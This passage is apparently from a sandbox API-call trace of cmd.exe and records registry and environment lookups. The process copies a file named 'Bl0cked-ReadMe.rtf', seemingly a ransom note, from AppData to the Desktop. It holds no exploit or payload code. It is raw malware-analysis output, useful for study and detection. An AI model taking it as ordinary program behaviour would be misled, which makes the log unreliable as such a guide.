Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.210] GetConsoleOutputCP () returned 0x1b5 [0225.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.210] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.210] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.210] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.211] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.211] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.211] GetEnvironmentStringsW () returned 0x420178* [0225.211] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0225.211] GetEnvironmentStringsW () returned 0x420178* [0225.211] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0225.211] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee3c | out: phkResult=0x22ee3c*=0x40) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0xa0, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x0, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegCloseKey (hKey=0x40) returned 0x0 [0225.212] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee3c | out: phkResult=0x22ee3c*=0x40) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: 
lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x0, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x9, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x9, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x9, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegCloseKey (hKey=0x40) returned 0x0 [0225.212] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.212] srand (_Seed=0x5b8863b9) [0225.212] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" [0225.212] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" [0225.212] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.212] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.213] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.213] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.213] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.213] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.213] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.213] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.213] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.213] GetEnvironmentStringsW () returned 0x4222c8* [0225.213] FreeEnvironmentStringsW (penv=0x4222c8) returned 1 [0225.213] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.213] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.213] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.213] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.213] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.213] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.213] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.213] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fc08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fc08, lpFilePart=0x22fc04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fc04*="Desktop") returned 0x18 [0225.213] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f984 | out: lpFindFileData=0x22f984) returned 0x420008 [0225.214] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0225.214] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.214] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.214] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.214] GetEnvironmentStringsW () returned 0x422ae8* [0225.214] FreeEnvironmentStringsW (penv=0x422ae8) returned 1 [0225.214] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.215] GetConsoleOutputCP () returned 0x1b5 [0225.215] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.215] GetUserDefaultLCID () returned 0x409 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd48, cchData=128 | out: lpLCData="0") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd48, cchData=128 | out: lpLCData="0") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd48, cchData=128 | out: lpLCData="1") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.216] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.216] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.216] GetConsoleTitleW (in: lpConsoleTitle=0x4108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.217] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.217] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.217] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.217] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.217] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.217] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.218] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0225.218] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.218] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.221] GetFileType (hFile=0x7) returned 0x2 [0225.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22fc40 | out: lpMode=0x22fc40) returned 1 [0225.222] _dup (_FileHandle=1) returned 3 [0225.222] _close (_FileHandle=1) returned 0 [0225.222] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0225.222] 
CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22fc10, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0225.224] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0225.224] GetConsoleTitleW (in: lpConsoleTitle=0x22fa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.224] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0225.224] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0225.224] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0225.224] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0225.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.225] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f5a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f5a4) returned 0x410e60 [0225.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0225.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0225.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0225.226] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e4b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0225.226] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] GetFileType (hFile=0x54) 
returned 0x1 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e508 | out: lpFileSizeHigh=0x22e508*=0x0) returned 0x1632 [0225.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.226] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.227] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] GetFileType (hFile=0x4c) returned 0x1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] GetFileType (hFile=0x4c) returned 0x1 [0225.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.227] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] GetFileType (hFile=0x4c) returned 0x1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] GetFileType (hFile=0x4c) returned 0x1 [0225.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.228] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.229] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, 
lpOverlapped=0x0) returned 1 [0225.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.229] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 
| out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] GetFileType (hFile=0x4c) returned 0x1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.230] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.231] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] GetFileType (hFile=0x4c) returned 0x1 [0225.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.231] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, 